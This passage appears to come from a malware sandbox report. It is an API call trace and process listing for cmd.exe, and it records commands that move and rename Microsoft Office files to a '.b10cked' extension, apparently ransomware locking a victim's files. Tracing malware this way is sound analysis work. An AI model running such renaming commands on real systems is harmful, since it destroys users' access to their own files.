lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x9, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x9, lpcbData=0x18e7d0*=0x4) returned 0x0 [0172.313] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, 
lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x9, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0172.313] RegCloseKey (hKey=0x40) returned 0x0 [0172.313] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886388 [0172.313] srand (_Seed=0x5b886388) [0172.313] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked\"" [0172.313] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked\"" [0172.314] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.314] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x351978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.314] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.314] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.314] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.314] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.314] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.314] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.314] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.314] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0172.314] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.314] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.314] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.314] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.314] GetEnvironmentStringsW () returned 0x352368* [0172.314] FreeEnvironmentStringsW (penv=0x352368) returned 1 [0172.315] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.315] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.315] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.315] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.315] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.315] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.315] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.315] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.315] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.315] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.315] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f598 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.315] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f598, lpFilePart=0x18f594 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f594*="Desktop") returned 0x18 [0172.315] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.315] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314) returned 0x3509f8 [0172.315] FindClose (in: hFindFile=0x3509f8 | out: hFindFile=0x3509f8) returned 1 [0172.315] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314) returned 0x3509f8 [0172.315] FindClose (in: hFindFile=0x3509f8 | out: hFindFile=0x3509f8) returned 1 [0172.315] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314) returned 0x3509f8 [0172.316] FindClose (in: hFindFile=0x3509f8 | out: hFindFile=0x3509f8) returned 1 [0172.316] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.316] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.316] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.316] GetEnvironmentStringsW () returned 0x350218* [0172.316] FreeEnvironmentStringsW (penv=0x350218) returned 1 [0172.316] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.316] GetConsoleOutputCP () returned 0x1b5 [0172.317] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.317] GetUserDefaultLCID () returned 0x409 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f6d8, cchData=128 | out: lpLCData="0") returned 2 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f6d8, cchData=128 | out: lpLCData="0") returned 2 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f6d8, cchData=128 | out: lpLCData="1") returned 2 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.317] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.318] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.318] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.318] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.319] GetConsoleTitleW (in: lpConsoleTitle=0x340938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.319] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.319] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.319] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.319] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.320] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.320] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.320] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.320] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.320] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.320] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.320] _wcsicmp 
(_String1="REM/?", _String2="move") returned 5 [0172.323] GetConsoleTitleW (in: lpConsoleTitle=0x18f3d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.323] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0172.323] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0172.323] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0172.323] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0172.323] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0172.324] _wcsicmp (_String1="move", _String2="CD") returned 10 [0172.324] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0172.324] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0172.324] _wcsicmp (_String1="move", _String2="REN") returned -5 [0172.324] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0172.324] _wcsicmp (_String1="move", _String2="SET") returned -6 [0172.324] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0172.324] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0172.324] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0172.324] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0172.324] _wcsicmp (_String1="move", _String2="MD") returned 11 [0172.324] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0172.324] _wcsicmp (_String1="move", _String2="RD") returned -5 [0172.324] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0172.324] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0172.324] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0172.324] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0172.324] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0172.324] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0172.324] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0172.324] _wcsicmp (_String1="move", _String2="VER") returned -9 [0172.324] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0172.324] 
_wcsicmp (_String1="move", _String2="EXIT") returned 8 [0172.324] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0172.324] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0172.324] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0172.324] _wcsicmp (_String1="move", _String2="START") returned -6 [0172.324] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0172.324] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0172.324] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0172.326] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.326] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.326] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f18c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f184, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f184*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.326] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0172.326] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0172.326] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0172.326] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0172.326] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0172.326] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0172.327] _wcsnicmp 
(_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0172.327] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0172.328] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0172.328] _wcsicmp (_String1="OUTLLI~2.TRX", _String2=".") returned 65 [0172.328] _wcsicmp (_String1="OUTLLI~2.TRX", _String2="..") returned 65 [0172.328] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlli~2.trx")) returned 0x2020 [0172.622] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x351f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.623] SetErrorMode (uMode=0x0) returned 0x0 [0172.629] SetErrorMode (uMode=0x1) returned 0x0 [0172.629] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX", nBufferLength=0x104, lpBuffer=0x18eb14, lpFilePart=0x18eafc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX", lpFilePart=0x18eafc*="OUTLLI~2.TRX") returned 0x3c [0172.629] SetErrorMode (uMode=0x0) returned 0x1 [0172.629] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0172.629] _wcsicmp (_String1="OUTLLI~2.TRX", _String2=".") returned 65 [0172.629] _wcsicmp (_String1="OUTLLI~2.TRX", _String2="..") returned 65 [0172.629] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outlli~2.trx")) returned 0x2020 [0172.629] SetErrorMode (uMode=0x0) returned 0x0 [0172.630] SetErrorMode (uMode=0x1) returned 0x0 [0172.630] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX", nBufferLength=0x104, lpBuffer=0x18ef90, lpFilePart=0x18ed28 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX", lpFilePart=0x18ed28*="OUTLLI~2.TRX") returned 0x3c [0172.630] SetErrorMode (uMode=0x0) returned 0x1 
[0172.630] SetErrorMode (uMode=0x0) returned 0x0 [0172.630] SetErrorMode (uMode=0x1) returned 0x0 [0172.630] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f198, lpFilePart=0x18ed28 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked", lpFilePart=0x18ed28*="OUTLLIBR.REST.trx_dll.b10cked") returned 0x4d [0172.630] SetErrorMode (uMode=0x0) returned 0x1 [0172.630] SetLastError (dwErrCode=0x0) [0172.630] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.rest.trx_dll.b10cked")) returned 0xffffffff [0172.630] GetLastError () returned 0x2 [0172.630] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x18e6a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e6a4) returned 0x352138 [0172.630] FindNextFileW (in: hFindFile=0x352138, lpFindFileData=0x18e6a4 | out: lpFindFileData=0x18e6a4) returned 0 [0172.631] GetLastError () returned 0x12 [0172.631] FindClose (in: hFindFile=0x352138 | out: hFindFile=0x352138) returned 1 [0172.632] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x351cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x351cc8) returned 0x352138 [0172.632] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0172.632] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x18e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0172.632] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.rest.trx_dll")) returned 0x2020 [0172.632] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\outllibr.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0172.633] FindClose (in: hFindFile=0x352138 | out: hFindFile=0x352138) returned 1 [0172.633] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e8f0 | out: _Buffer=" 1") returned 9 [0172.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.633] GetFileType (hFile=0x7) returned 0x2 [0172.633] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.633] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e87c | out: lpMode=0x18e87c) returned 1 [0172.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.633] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e8b0 | out: lpConsoleScreenBufferInfo=0x18e8b0) returned 1 [0172.633] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.634] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e8f0 | out: 
lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0172.634] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e8d4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e8d4*=0x1a) returned 1 [0172.634] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.634] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.634] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.634] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.634] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.634] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.634] SetConsoleInputExeNameW () returned 0x1 [0172.634] GetConsoleOutputCP () returned 0x1b5 [0172.634] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.634] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.635] exit (_Code=0) Process: id = "295" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0x848" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23007 start_va = 0x10000 end_va = 0x2ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23008 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23009 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23010 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 23011 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23012 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23013 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23014 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23015 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 23016 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23369 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23370 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = 
"" Region: id = 23371 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 23372 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23373 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 23374 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23375 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23376 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 